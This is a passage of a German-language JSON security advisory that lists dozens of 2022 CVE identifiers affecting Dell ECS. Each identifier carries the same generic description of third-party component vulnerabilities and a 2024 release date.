"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2874"
},
{
"cve": "CVE-2022-28748",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-28748"
},
{
"cve": "CVE-2022-2880",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2880"
},
{
"cve": "CVE-2022-2889",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2889"
},
{
"cve": "CVE-2022-29162",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29162"
},
{
"cve": "CVE-2022-29187",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29187"
},
{
"cve": "CVE-2022-2923",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2923"
},
{
"cve": "CVE-2022-2946",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2946"
},
{
"cve": "CVE-2022-29526",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29526"
},
{
"cve": "CVE-2022-29583",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29583"
},
{
"cve": "CVE-2022-2964",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2964"
},
{
"cve": "CVE-2022-2977",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2977"
},
{
"cve": "CVE-2022-2980",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2980"
},
{
"cve": "CVE-2022-2982",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2982"
},
{
"cve": "CVE-2022-29900",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29900"
},
{
"cve": "CVE-2022-29901",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-29901"
},
{
"cve": "CVE-2022-2991",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2991"
},
{
"cve": "CVE-2022-3016",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3016"
},
{
"cve": "CVE-2022-3028",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3028"
},
{
"cve": "CVE-2022-3037",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3037"
},
{
"cve": "CVE-2022-30580",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-30580"
},
{
"cve": "CVE-2022-30630",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-30630"
},
{
"cve": "CVE-2022-30631",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-30631"
},
{
"cve": "CVE-2022-30632",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-30632"
},
{
"cve": "CVE-2022-30633",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-30633"
},
{
"cve": "CVE-2022-3099",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3099"
},
{
"cve": "CVE-2022-31030",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-31030"
},
{
"cve": "CVE-2022-31159",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-31159"
},
{
"cve": "CVE-2022-3134",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3134"
},
{
"cve": "CVE-2022-3153",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3153"
},
{
"cve": "CVE-2022-3169",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3169"
},
{
"cve": "CVE-2022-31690",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-31690"
},
{
"cve": "CVE-2022-32148",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-32148"
},
{
"cve": "CVE-2022-32149",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-32149"
},
{
"cve": "CVE-2022-32206",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-32206"
},
{
"cve": "CVE-2022-32208",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-32208"
},
{
"cve": "CVE-2022-32221",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-32221"
},
{
"cve": "CVE-2022-3234",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3234"
},
{
"cve": "CVE-2022-3235",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3235"
},
{
"cve": "CVE-2022-3239",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3239"
},
{
"cve": "CVE-2022-3278",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3278"
},
{
"cve": "CVE-2022-3296",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3296"
},
{
"cve": "CVE-2022-3297",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3297"
},
{
"cve": "CVE-2022-33196",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33196"
},
{
"cve": "CVE-2022-3324",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3324"
},
{
"cve": "CVE-2022-3352",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
